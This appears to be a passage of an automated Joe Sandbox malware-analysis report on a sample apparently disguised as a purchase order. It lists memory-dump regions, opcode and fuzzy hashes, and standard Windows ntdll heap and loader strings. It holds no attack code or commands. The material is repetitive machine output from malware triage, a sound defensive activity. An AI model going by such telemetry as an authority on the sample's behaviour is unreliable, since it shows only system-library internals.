                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                              • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                              • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                              • Instruction Fuzzy Hash:

                                              Control-flow Graph (legend: Executed, Not Executed)
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 897a505325989b761a5fa03c42d6afa4248fb1945446fad1051f6e85f9a6d4f9
                                              • Instruction ID: c76a9319ed14425367755e38fa8bd10afef3dde1692291d7101753c775330bb2
                                              • Opcode Fuzzy Hash: 897a505325989b761a5fa03c42d6afa4248fb1945446fad1051f6e85f9a6d4f9
                                              • Instruction Fuzzy Hash: FD51EAB5A0421ABFDB11DBD8899097EF7B8BB0824475083A9E4A5D7741DB74DE408FE0

                                              Control-flow Graph (legend: Executed, Not Executed)
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: cc09e1c39b52784764a3b9859e8da4353a8c6b1adefe1ab57214913b4012250d
                                              • Instruction ID: d7be3c04802152a506655dcf7404cf7bdd36cb433459f76ee94e66cd81ec0d9b
                                              • Opcode Fuzzy Hash: cc09e1c39b52784764a3b9859e8da4353a8c6b1adefe1ab57214913b4012250d
                                              • Instruction Fuzzy Hash: 1251F775E00745AFEB60CF9CCC9097FF7F9AB44240B40865AE495D7691EAB4DE408B60

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP:
                                              • API String ID: 3446177414-2466845122
                                              • Opcode ID: 2cae4c3f78a9ef079b2ecf9e378daee427ef0442c37c99c318a367363266f108
                                              • Instruction ID: 5909930deb6fef4c8d0a4170e0d7b2ce71f8148bb4ca6d735937b746b62f5f16
                                              • Opcode Fuzzy Hash: 2cae4c3f78a9ef079b2ecf9e378daee427ef0442c37c99c318a367363266f108
                                              • Instruction Fuzzy Hash: 0AA1AE75B043158FE705CE18C890A6ABBE9FF89B50F05466DE945EB310EB70EC86CB91

                                              Strings
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34884725
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 348846FC
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34884655
                                              • Execute=1, xrefs: 34884713
                                              • ExecuteOptions, xrefs: 348846A0
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 34884787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34884742
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 75ffa8cf13ed07273fada0b05bb795160c39b24fbf4ed79e07126606e9ddc8ad
                                              • Instruction ID: de33f258127c84119db10dde41cdd78ff9fc4a8fe0ba5ae0cda9cd48ee6821ef
                                              • Opcode Fuzzy Hash: 75ffa8cf13ed07273fada0b05bb795160c39b24fbf4ed79e07126606e9ddc8ad
                                              • Instruction Fuzzy Hash: DF51F67660021DAEFB14AAA8DC85FAA77BDEF04340F4002E9E515AB390EB719E45CF50
                                              Strings
                                              • Actx , xrefs: 34877A0C, 34877A73
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348779FA
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 348779D0, 348779F5
                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34877AE6
                                              • SsHd, xrefs: 3482A3E4
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348779D5
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                              • API String ID: 0-1988757188
                                              • Opcode ID: 353ce54ca60ebab9367a10e49691e25a1351caaf8f49df7fd02ed7ad27698426
                                              • Instruction ID: 5c76cec2ee74889a6ad86b9e3a5c703a0a076ee7f8cc1f4d819e65961f27e088
                                              • Opcode Fuzzy Hash: 353ce54ca60ebab9367a10e49691e25a1351caaf8f49df7fd02ed7ad27698426
                                              • Instruction Fuzzy Hash: 66E19F756047028FE714CE28C994B9BBBE5EF84364F504B2DE865CB291DB31E9C5CB81
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                              • API String ID: 3446177414-4227709934
                                              • Opcode ID: c1f387d71624741d071ea95a74f14fd29e394707e3cdd486cefd81b43a973fb7
                                              • Instruction ID: ea11dd7b0e4f0db786b8e65f17f58daf5fe77b4931fc90c364a5bfb329c8ced1
                                              • Opcode Fuzzy Hash: c1f387d71624741d071ea95a74f14fd29e394707e3cdd486cefd81b43a973fb7
                                              • Instruction Fuzzy Hash: 75414AB9E00209AFDB11DF99C980ADEBBB5FF48754F100259EE04BB341D771A951CBA0
                                              APIs
                                              Strings
                                              • LdrpLoadShimEngine, xrefs: 34869ABB, 34869AFC
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34869AC5, 34869B06
                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34869AF6
                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34869AB4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-3589223738
                                              • Opcode ID: 65e9325ac1970fa45466d7410d42951daf18262d980758d36166800ca386f4cb
                                              • Instruction ID: 06b47a2abaa4929768dc8480efab0e4c3b797a8de2f11ad5f29d06c2d22a88c7
                                              • Opcode Fuzzy Hash: 65e9325ac1970fa45466d7410d42951daf18262d980758d36166800ca386f4cb
                                              • Instruction Fuzzy Hash: 1D510376A10318DFEB14CBACCC44AADBBA5FB44314F044359E561BB2A5DBB09C82CF94
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                              • API String ID: 3446177414-3224558752
                                              • Opcode ID: a1029814518ea4067e17c3849dd40342d681083cca4d0f1f667d92a584cd2f19
                                              • Instruction ID: 6bc4987e786fb6fb2aac7ffe0d308eea315aaf7a9f6b47fca9e8ad25cfed9429
                                              • Opcode Fuzzy Hash: a1029814518ea4067e17c3849dd40342d681083cca4d0f1f667d92a584cd2f19
                                              • Instruction Fuzzy Hash: 6F411479601744DFE702CF68C894B9ABBE8EF44368F1083A9E5215B791CB74A881CBD1
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 348BF250
                                              • RtlDebugPrintTimes.NTDLL ref: 348BF2C5
                                                • Part of subcall function 3480B970: LdrInitializeThunk.NTDLL ref: 3480B989
                                              Strings
                                              • HEAP: , xrefs: 348BF15D
                                              • ---------------------------------------, xrefs: 348BF279
                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 348BF263
                                              • Entry Heap Size , xrefs: 348BF26D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes$InitializeThunk
                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                              • API String ID: 1259822791-1102453626
                                              • Opcode ID: af35bb700b65e52440f72ad04510499cf30ed27372e1f9f87bde46baba107fbc
                                              • Instruction ID: 65cdb5f800cafd42ac7777d53c4ca5b3cda34c2db346e872a7ea235cf97764fa
                                              • Opcode Fuzzy Hash: af35bb700b65e52440f72ad04510499cf30ed27372e1f9f87bde46baba107fbc
                                              • Instruction Fuzzy Hash: A941BA39A00215DFEB06CF99C880909BBE5EF89354725866AD598EB311D771EC82CF90
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                              • API String ID: 3446177414-1222099010
                                              • Opcode ID: 58f5f5b11275c7ccb08d900b63c2ea955ba774733251122524c170e371b24321
                                              • Instruction ID: 3667b7de3084c100477cc5d458b5fcb1eb837ad152de5d2bba611e1ad5e127a6
                                              • Opcode Fuzzy Hash: 58f5f5b11275c7ccb08d900b63c2ea955ba774733251122524c170e371b24321
                                              • Instruction Fuzzy Hash: 8031B4392157C4EFF712CB68C854B957BE8EF01794F004399E4655B752CBA4A8C2CE51
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 96f4d63149b4d7300a79f113b5abb1d1846c446d0df920c87355a4a3d0efd311
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: A781B078E052498FEF048E6CC8917EEBBB6AF65390F5447DDE860A72B0CB349840CB50
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$@
                                              • API String ID: 3446177414-1194432280
                                              • Opcode ID: 37823b47389b146ff77021ca5eb36eb8144a7a8627b477ab28beeac9bc924ef5
                                              • Instruction ID: 58aa6378e5cfeee14080c4c23f9e3f14fd334df2ecaf16b98e19bcb9aeab49fc
                                              • Opcode Fuzzy Hash: 37823b47389b146ff77021ca5eb36eb8144a7a8627b477ab28beeac9bc924ef5
                                              • Instruction Fuzzy Hash: C0810AB5D00269DFEB25CB54CC54BDABBB8AF08750F4042EAE919B7240D7709E85CFA4
                                              APIs
                                              Strings
                                              • LdrpFindDllActivationContext, xrefs: 34883636, 34883662
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 3488365C
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 34883640, 3488366C
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3488362F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-3779518884
                                              • Opcode ID: e88563edf3178c201de01634cc55ff8ad078f9639f984f3687d547bd97cf1016
                                              • Instruction ID: 5b49ec517878c167c88ef0ab55545ba59827933bebea13d3e59b6bd1576e37ee
                                              • Opcode Fuzzy Hash: e88563edf3178c201de01634cc55ff8ad078f9639f984f3687d547bd97cf1016
                                              • Instruction Fuzzy Hash: A831D56AA0175DFFFB21DB18CC44B55B6A8FB01FD4F46436AE81867350EBA09CC08B95
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3610490719
                                              Strings
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 34887B7F
                                              • RTL: Resource at %p, xrefs: 34887B8E
                                              • RTL: Re-Waiting, xrefs: 34887BAC
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3488728C
                                              Strings
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 34887294
                                              • RTL: Resource at %p, xrefs: 348872A3
                                              • RTL: Re-Waiting, xrefs: 348872C1
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Wow64 Emulation Layer
                                              • API String ID: 3446177414-921169906
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              Similarity
                                              • API ID:
                                              • String ID: 0$Flst
                                              • API String ID: 0-758220159
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 3489CFBD
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Qw@4Qw
                                              • API String ID: 4062629308-2383119779
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: 0$0
                                              • API String ID: 3446177414-203156872